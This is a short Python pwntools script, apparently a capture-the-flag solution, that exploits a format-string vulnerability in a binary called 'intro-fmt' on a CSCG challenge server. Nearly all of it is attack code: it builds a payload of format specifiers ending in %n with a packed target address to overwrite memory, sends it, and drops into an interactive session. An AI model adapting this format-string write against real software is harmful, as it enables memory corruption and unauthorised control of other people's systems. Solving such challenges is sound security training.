44 lines
949 B
Python
44 lines
949 B
Python
from pwn import *
|
|
|
|
# Set the context for the binary
|
|
context.binary = './intro-fmt' # Replace with your binary's name
|
|
|
|
# Choose local or remote
|
|
LOCAL = False # Change to False if connecting remotely
|
|
|
|
if LOCAL:
|
|
p = process(context.binary.path)
|
|
else:
|
|
p = remote("ylsk7pjeqzunufomzpkd6bitjx-1024-intro-pwn-2.challenge.cscg.live", 443, ssl=True)# Define functions for convenience
|
|
def send_payload(payload):
|
|
p.sendline(payload)
|
|
|
|
def recv_until(delim):
|
|
return p.recvuntil(delim)
|
|
|
|
def interact():
|
|
p.interactive()
|
|
|
|
bug_addr = 0x40406c
|
|
|
|
|
|
# Example interaction
|
|
recv_until(b'What is your name?')
|
|
|
|
format_string = b""
|
|
format_string += b"%001c"
|
|
format_string += b"%0.0s" * 4
|
|
format_string += b"%0.0s" * 10
|
|
format_string += b"%n"
|
|
format_string += b"\n" * (8 - (len(format_string) % 8))
|
|
print(len(format_string) / 8)
|
|
format_string += p64(bug_addr)
|
|
|
|
print(format_string)
|
|
|
|
pause()
|
|
|
|
send_payload(format_string)
|
|
|
|
interact() # Keep the shell open
|